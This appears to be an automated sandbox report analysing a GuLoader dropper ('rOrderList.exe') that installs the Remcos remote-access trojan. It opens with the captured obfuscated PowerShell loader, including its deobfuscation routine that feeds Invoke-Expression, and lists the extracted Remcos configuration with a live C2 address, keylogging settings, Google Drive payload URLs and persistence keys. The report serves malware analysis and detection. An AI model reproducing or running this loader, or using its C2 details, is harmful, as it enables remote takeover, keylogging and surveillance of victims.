P8AsCex8Op4DuEBlBBeESk8FaFMo8 H8 ACCrE ICPo8 s4 WFTe7ReEAd5CoCVa2 bDAn8AcFBuCUnDPa8 MDSnE RF U1 G8Ty0Cy8HoCSwFBi7HyFPh9MeE L5PaCLa2NeDGi8Re9 SF D9 TE UFUn1 S8Pi5Be8 SCOl8 O4 pFGa7FoE f5 RC B2FoDBh8VeF SCRaDHu8 DDSaE AFCe1 S8Le5 B8 S5Tr8Bl5Mo'Ja;Po& D(Fo`$VeHUnoMes apUriOrtUtaDelDr7re) C V`$RaP Na DlZoeCoo LzSeoWei Dcsp0Co1Sl; S`$MiPEkaSnlPhe OoIdz Foeni ScEn0Fl2Pr A=Su MW La SfStfPreand H8Ra Ln' A8 s8RaFSp9CaCca2ReD EESyCPr3KoCAl0 FC s0IdC tD AC KEDeCfl0TyC e9Sr8ImCAr9Ge1Ek8 SCPrFLa7BlFSkFReD R5 aDMiF FDLi8 MCWi9CaC U1ve8Ar2UnF VELoD O9grCPl2ErD B8BeCDi5KrCAl1 SCLi9 S8 A2ViE S5UnC P2SuDDi8HaCin9LoDLiESlCRe3 GDInCDyFRdF BCHe9InDShE BDsuA ACMe5 CCTeFPoC P9 FDKeFNa8Bi2 NE E1OvCAsDUnD RE tDQuFUnC a4FeC MD TCTr0 FFBu1Gr9 D6Ps9 S6SyEAlBCoCKo9TiD T8RuE P8 BCGr9TrC C0 OCCo9ObCunB PCHeD GDPi8 TCPr9GaE AALaC I3ArDBlE hEFaAHeD T9 PC t2 VCkiF BDAs8waCUd5 UCRe3KnC F2 UFTaC ACLi3 ACFl5 ACAb2SkDNe8NeC H9 ADReERe8 E4Se8 A4 TC hA tCTr7SpDInCUd8 SCAs8Co8 HDEx8 GDOm9PoDBrC JDFoCIbCDe9 DCCe8Re8KaCSa8 S8BlFPhC aCUnDpaC H0GyCSo9 ACfr3ToDNa6PrC B3AuCHj5DiCPaFud9UvC D9GuFCw8Ad5Br8Fe0 N8KaC O8St4 fEAfBDkE s8 OF F8 a8BoCAtETeCSt8 P4ClF P7UnEVi5ReCTr2OcDPo8 UF TCFoD B8BrD AEFiF A1Fr8Pr5Pe8 AC U8 R4 AFTi7EvEFi5 EC H2reD O8UnFSiCDeDun8utDJaEheF D1Mt8Ca5Hg8 s5 A8Da5Be' F;Un&Ka(Lo`$ DH Go SsRep SiDetRya BlVa7 D)Ae Kr`$BeP GaunlToeCuo TzPuo Mi RcPu0Ov2 e;Ne`$ SV SiEmz AsGllOma CsUl7 L S=Qu SuW IaAcfCofAve Md P8An Pr' T8 P8 SFBeFMiD uCpeC s5FuCRo2TyDMoFhuDEl8 TCFo9 sD KEPeDTaFTaCli4UnC S5vaDSvCSl8TeCBl9 F1Ea8efCSa8Bo8LaF K9TiC B2TeDShEFoC L3 SC P0SkCDi0 SCOvDLeC KEReCMe0 LCRu9De8Eg2 FEKm5 VC A2CaD TA BC S3BoCRo7BiC P9Ta8 F4An9MeCLi8 a5 O'Si; E& C( N`$TyHSgoIgs np Ui PtAgaOmlDe7ca)Ov B`$KaVPhisezArsEmlOra Ss G7St;Pr`$ RVLiiRaz SsPilRoa Hspr7 C B=Ru StWRea EfAzfFae Bd F8Ba Op'Un8 c8SiEAl9ApCHe2 BCDeB VC A9 FD SE mCFo1 SCNo5 UC k2AgC CD AD P8 MC p9Ta8Bj2UnEPu5ReC H2 UDPoASpC H3AfCUn7PsCNa9 R8Fo4 M8Pi8SiF DF SDElC OCSl5 FCCu2skDBaFAnDBe8SeC P9 CD TEEpD PFScC u4EpC V5IsD ZCSu8Mo0Ov8AcC y9 SC N8Se5Am'Se;Mo& O( l`$ LH Ao fs EpAbi BtTea RlNo7Ge)Ca En`$ rV MiExzFrsUnlSla Rs P7Sc;co`$MuACafCrtHea Jl OeVifFao Ar Al Cb S Un=Ln UnfKak Ap R Pa`$UaHUno TsDipAlistt SaLilRi5 K Tr`$ FHDioFas ApJoiIntCaa TlBi6Se;Fo`$PeVSaiDazsts Pl Ka DsPl7Na Re=Do CW DaLyf CfDaeAfd T8Op A'la8Pr8 SFsk9LoC D2 ECTi8StCTe9PrCOmFRyC S7LaCCa9InCgn8In9GaF R8BiCTe9fr1En8TrC O8Sl8ReCouDSpCEl0 RCUhABeCAl9PiCApA SC n3SpCUt0ReC N7 I8Te2AfEpr5HiCRe2LoDSaAKeCUf3 UCSp7 MCBo9 C8Sk4peFUn7 DEKe5 JC T2LiD S8DeFMiCHyDBu8AaDHaEBaF T1Ha9Ap6No9 G6slFsa6FiCVo9FeD HEUdCGr3Ma8Pl0 B8 BCko9 rA C9UdFNa9Dr9Go8Nu0 U8ReCHa9PrC vD M4Os9 SF G9 UCFl9DiC M9CaC T8 K0 S8SyC D9AkCDeD U4Co9 A8 P9 OC d8 S5Ke'Vu;Gl& S(br`$ GH DoFosSupPeiLetUaansl D7Or) S Ge`$StVCai pzTosUdl Ba as S7 C;Su`$ DVUnisezStsEpl OaresLu8Fa Mu= C TW ta Vf EfFaeardBa8 S Ar'Hy8 H8VeD CC ACBr3BrC p0 MD C5 ACSe9 bCDy1UmC U5 MCReDJg8 RC M9Ta1An8 OCUd8Dv8DyCPeDBoCSt0klCDeAIdCIr9 NC FAauCDy3 VCAs0acCTe7Al8 I2SpE M5DaCPs2 UDBaAThCRe3 ICha7OvCCe9 s8 F4FoFNa7unEDe5KaCMe2 BD D8HoFNoCBeD D8PlDreE AF T1Un9 R6So9 U6 KF G6 SCLu9HeDPrEFoC T3 N8Ro0 D8 FC A9Di4Sv9BoDCa9La4 p9 ABCo9Br5Re9 MC K9Fo8Un9 LCJu8An0 K8riC K9 CC cDfi4 U9GrFKa9 NCGe9ChC M9NeC D8Se0 F8 OC g9DiC AD B4 S9Se8Un8Al5Sa'Mi; S& U(Sa`$DiH Bo Ps Ipmoi atHyaNol D7 I)bi Lm`$ EV TiPrz ps Hl ta PsSa8 Y;Fy`$GuU HnLadBle ScOmkskeZod U2 R=Re`"""Ti`$ weTrn Av O:anLreOSuCSuA pLBrAAxPFoP gD BAFrTNoABl\ TITon Dt Be IrunpFraInrChtBueApsZif Doter Sh PoBll Ed O\StSAftBerCoeTrn SgReeDil Wenig AeCu\ FS EmfoaMel CsUniAmdLaeBarSln AeBasBo\SpOMad SiLauLem T2Da0 K6tr. SFMal So B3 P5Vi`""" R;Gu`$PsVTeiOnzSts KlTeaPls F9 D Gy=Ra UnWFraEmf Ef AenedTe8Ke P' U8In8 UFSaA FCPu5ReDUn6 DDDeFStCCe0 KCAkD NDBeF P8 RC F9Fu1Bo8StCNiFKu7spFSoF IDVi5 LD LFSpD I8 SC S9FeC H1Wi8Wi2 BEDe5 FE a3 I8 S2MiELaATuCud5 MCNe0 dC R9 AFCr1Tu9 U6 R9 A6 SFtiERiC B9GeCApDElCTu8ToE PDPrC I0CaCUd0EnE UEDeDPi5 nDDi8 ECno9 NDsiFEl8 B4 C8 l8NaF A9BaCTr2 SCPr8UdCOn9 PCAfF LCPr7 KCBu9TyCNo8Ef9MnEPe8Fo5Fo' V;Un&na( S`$ BHaro SsKup CiEkt Da Bl P7Ca) F Ti`$AfVDaiDuz ls Nl Ba osSa9So;da`$PaWAnaBof BfKheRedCa0Si Fo= G BWIna SfFlfIne adEc8 B Mi'deFCu7StF PFEmD a5BeD LFSoDLu8 CCAr9 JCPa1 S8 d2 HF HEKoDCh9YpCNo2OrDSl8 UC V5 DC C1YnC F9Co8Sy2SeE A5ShCNa2LuDDu8SkCTa9NdD TE SCKr3AuDHeCBiFElFNoC E9KiD AEHuDSkA RC B5RoC DFRuCKl9RvD AFPo8 C2 VESt1EtCTiD SDUnESpDKoFBaCAn4miCBeD DCUn0DaFpu1Mo9re6 T9 T6 AE PF UC S3UnDStC aD D5Re8 F4 G8Hy8SkFOvA ACSt5ZiDSm6GrD MF ICNo0CoCGrDGeDUgFTr8Ha0 K8 iC g9VaF L9MaCSk9AcESa9Tr8 l8ta0 a8 cCGl8StCSl8ud8 BFRh9BeC M2GaC G8DoC A9TiC CF SCIm7OvCAr9 sCFe8Je9HoF V8 B0 S8 GCCa9NoAVa9 CF P9Pr9Al8Bo5 B' B;Ed&Ov(Or`$LgHFlo TsHipAniLotLia El S7 P)Pr Ca`$prW CaThf SfNoeCydRu0Be;Ly`$AnP potal me EmInoPan Ui SuHem O=Cl`$SaVAni Lz CsInlBla msCo. VcKaoFuu PnLit N- M6Ru3Ho5 G-Bo3 U0Be2 B4re; D`$ReWSta Bf SfPreTydVa1El Fo= p FlW DaTef Of UeRid G8Rk Li' RFMa7BoFPrF SD T5noD sFOmDSo8 PCRe9OvCPr1Ps8Dy2MoF SE FD M9 BCHe2BeDIn8PrC u5 RC K1BoCVa9Ne8Ri2 HETe5 EC U2ufDTa8NaC A9GrDSuE tC J3ShDHuCImF VFMaC G9 OD EE HD DAAnC H5AlCBlFSaC D9 CDFoFDe8De2 REKj1 NCHbD VD DE ADTrF NCTi4FoCUnD PCRe0InF R1Ir9Ev6 S9Af6TiE UFPiCMo3 UDDiCSlD A5mi8 F4Gl8ph8SoFShAteCgr5CaD F6DiD SFCuCre0 HCUnD SD CF h8 T0sm8 SCTi9BiARa9 JFsy9 A9 P8Ac7Mu9 NFNy9MiCEm9 ME A9Ra8 F8Re0Av8 KCDa8Fo8 BDBrCAnC s3anCFl0 TDGr5AfCPi9 UC A1InCPs5KaC EDAf8 S0 P8 KCNe8Ko8 AF MCPuCud3TiC R0 HCFa9BaCFu1ClC d3GuCre2AuCCy5UnDBe9SaCHa1Ta8 A5Gr'Lt; C& L(In`$HeH FobosJep Di DtUnaKul K7 c) L Co`$ AWSeaUrfTof ReBrdKr1 B;Br`$TiWPha RfEuf oeFidPi2Th Al=La lW La afAsf FeIndAf8 A Bj'Re8Bi8 TFatBTyCOv5 FC VA PCSl9UnC M7HvCRl5 DC R2Ns8 KC B9Ep1Sc8 BC kF b7TrFBeFImD C5 BDKuF RDUn8 ACKo9 rCKl1 P8Bu2 DFAkESpD R9NoCIr2 ID O8RaC b5 PC R1DiChi9Un8Pu2FrE U5KoCUd2UnDLa8 JC T9UdD NE SCIn3HoD PCAlF TF PC S9PhD mESwDGoASiCDa5MiCSnF TCBr9 ED FFUt8 I2SkEUn1 SCFjDreDanEDoDSpF MCBe4 AC LD BC V0 vFBo1 Z9 S6Se9Ly6PoE ABHeC B9 LDFe8SkEre8 UC n9 DCPe0CoCPr9BlC PBDeCReD DDBe8SaCUd9BlE OA NCMa3InDSmE IEPiAboD I9PiCRa2TrC kFFrDCh8 SCBa5 rC F3BaCco2NiFThC ECDe3 EC V5 BCSa2TrD S8 PCSt9DeDShEal8Be4So8De4LaCBsAKnC D7VuDGoCBl8 SCTa8 F8BiEAnA LClu5SdCMu3ShC H2 HCagD I8 MCUn8Pr8 OF K9 EC OE DC K9 BD DAStCSk5RiD tFHoCAf0 DCOp5 DC aB PCHo9AnD PFPi8Po5 F8Mi0Te8StCLa8 C4GcESoBafE D8kaFMo8 j8EmC DESpCAf8 O4FoFlu7 OEVa5 SCFo2 RDIn8 SFerCReDtr8tuD BEOuF E1Un8Sy0 A8SkC UFPj7BaEFj5 SC F2 ZDId8CoF SC SDIn8TeDBaEkiFDd1Sa8Fi0 B8aaC JF F7HmE F5unC D2 FD S8 WFflC HD C8SuDSlEBuFDe1In8Vl0St8NaC EF S7LoE I5VrC S2AnD s8BoF MCMiD F8 BD SEgrFNe1an8Re0Si8KeCTiFPo7enEge5VoC C2FoDSt8 MF CCBeD C8 PDRaESoFSy1Ve8Ge5Bl8PrC n8Ca4 GFBg7 bEOv5StCNo2 KD M8OvFDiCStD S8SaD SEPrF S1Sr8Re5At8 M5 T8 O5 D' C; a& V(Ul`$HyHKno WsRep CiSltSva Hl U7 N) A Te`$BiWAra SfAafBieAgd A2pr; i`$ wW DaKofNafRge Sd A3 C G=Cy EnWStaSlfUdfSceEfdUn8re Ud' I8 T8 FFmgBStCAf5UpCPrAMeCRe9AbC D7 PCPa5ExC L2Sa8 S2NeE M5 VCEn2ViDGlA LCSe3TeC B7PyCSk9 G8 D4 O8Tr8ViFCr9GaCUn2HuCCu8 AC A9trCDeF HCPr7CrC G9MiC D8Co9kuFph8Pl0 P8 M8SpDFoCJuC N3 RCGa0PlD k5 SCGa9InCOp1udC M5 WC SDSi8Ro0 T8 P8ChE FDDeCPrA UD A8 SCRiD AC b0LaCCh9MaCGaA FC J3 KDEnECrC F0 BC SESl8Me0Zi9PrCPl8 S0Di9 DCAg8Af5 P' Z;Na& S(Ae`$keH SoUnsbrpHei At Iahylbu7Vo) c G`$DeWhoaBuf bf teBadAc3sa# S;""";;Function Waffed9 { param([String]$Luvart); For($Polyphonically=2; $Polyphonically -lt $Luvart.Length-1; $Polyphonically+=(2+1)){ $Paleozoic = $Paleozoic + $Luvart.Substring($Polyphonically, 1); } $Paleozoic;}$Landvindings0 = Waffed9 'laIPrnRev FoMak Fe H-IdERex Np Hr Ae AsOvsUni poRenOr ';$Landvindings1= Waffed9 $Bisonerne;&$Landvindings0 $Landvindings1;<#Headreach Anomaloscope diasrammerne Formatordres Upknell Provenly #>; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • ieinstal.exe (PID: 4884 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • ieinstal.exe (PID: 5796 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": "45.82.84.10:2408:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-ADJC7K", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000006.00000003.3488569083.000000000757F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000006.00000003.3486333941.000000000757F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          Process Memory Space: powershell.exe PID: 400JoeSecurity_GuLoader_6Yara detected GuLoaderJoe Security
            Click to see the 1 entries

            Stealing of Sensitive Information

            barindex
            Source: Registry Key setAuthor: Joe Security: Data: Details: 9C 58 51 09 D3 1A B5 40 1C 18 2C 92 9C A7 1E 32 3E 87 8E B4 D6 80 72 86 E8 9F 96 F4 32 FB D2 9C 25 A4 DA 92 E2 71 E6 C1 E0 66 A0 FD A1 E3 F1 7C 9C 6D AF 12 EB B7 E6 28 0B C3 12 A6 51 80 FF 1E 4A F0 2C 55 65 5E B8 61 0C 75 D7 0A 16 23 B9 67 93 EE EE 44 E4 39 67 BA 35 88 08 7D 85 23 28 BE C2 30 E4 81 F5 D0 67 91 73 2B 89 FD , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Internet Explorer\ieinstal.exe, ProcessId: 5796, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-ADJC7K\exepath
            No Snort rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "45.82.84.10:2408:1", "Assigned name": "RemoteHost", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-ADJC7K", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
            Source: rOrderList.exeVirustotal: Detection: 21%Perma Link
            Source: Yara matchFile source: 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.3488569083.000000000757F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000003.3486333941.000000000757F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ieinstal.exe PID: 5796, type: MEMORYSTR
            Source: rOrderList.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\rOrderList.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaltedesJump to behavior
            Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.11.20:49796 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49797 version: TLS 1.2
            Source: rOrderList.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: prldap60.pdb source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.dr
            Source: C:\Users\user\Desktop\rOrderList.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
            Source: C:\Users\user\Desktop\rOrderList.exeCode function: 0_2_0040689A FindFirstFileW,FindClose,0_2_0040689A
            Source: C:\Users\user\Desktop\rOrderList.exeCode function: 0_2_00405C4E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C4E

            Networking

            barindex
            Source: Malware configuration extractorURLs: 45.82.84.10
            Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1KTmOxGhXIq2ElcP80VIZKg-V2XXDylRv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/u240eld0p0tadod6hiuj3dfkeglaump9/1682520225000/10652726447177276017/*/1KTmOxGhXIq2ElcP80VIZKg-V2XXDylRv?e=download&uuid=ced9cc8a-b62a-40b4-be8c-f2049575c42e HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-18-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49799 -> 45.82.84.10:2408
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownTCP traffic detected without corresponding DNS query: 45.82.84.10
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: rOrderList.exeString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
            Source: rOrderList.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
            Source: rOrderList.exeString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
            Source: powershell.exe, 00000004.00000002.1375869698.00000000070E5000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.1292453013.0000000007583000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.1297996409.0000000007582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: powershell.exe, 00000004.00000002.1375869698.00000000070E5000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.1292453013.0000000007583000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.1297996409.0000000007582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 00000004.00000002.1386413653.000000000854A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c
            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: ieinstal.exe, 00000006.00000003.1311830949.00000000075D6000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.1311996378.00000000075D7000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000002.5939740889.00000000075D9000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3485853968.00000000075D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
            Source: ieinstal.exe, 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/5
            Source: ieinstal.exe, 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3486333941.0000000007575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: ieinstal.exe, 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpI
            Source: ieinstal.exe, 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpZ
            Source: ieinstal.exe, 00000006.00000002.5938763780.000000000757F000.00000004.00000020.00020000.00000000.sdmp, ieinstal.exe, 00000006.00000003.3487806711.000000000757F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpk
            Source: powershell.exe, 00000004.00000002.1324481800.0000000002C4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micP
            Source: rOrderList.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: rOrderList.exe, 00000000.00000002.797609582.0000000002A90000.00000004.00000020.00020000.00000000.sdmp, rOrderList.exe, 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmp, prldap60.dll.0.dr, nsv3D6A.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0C
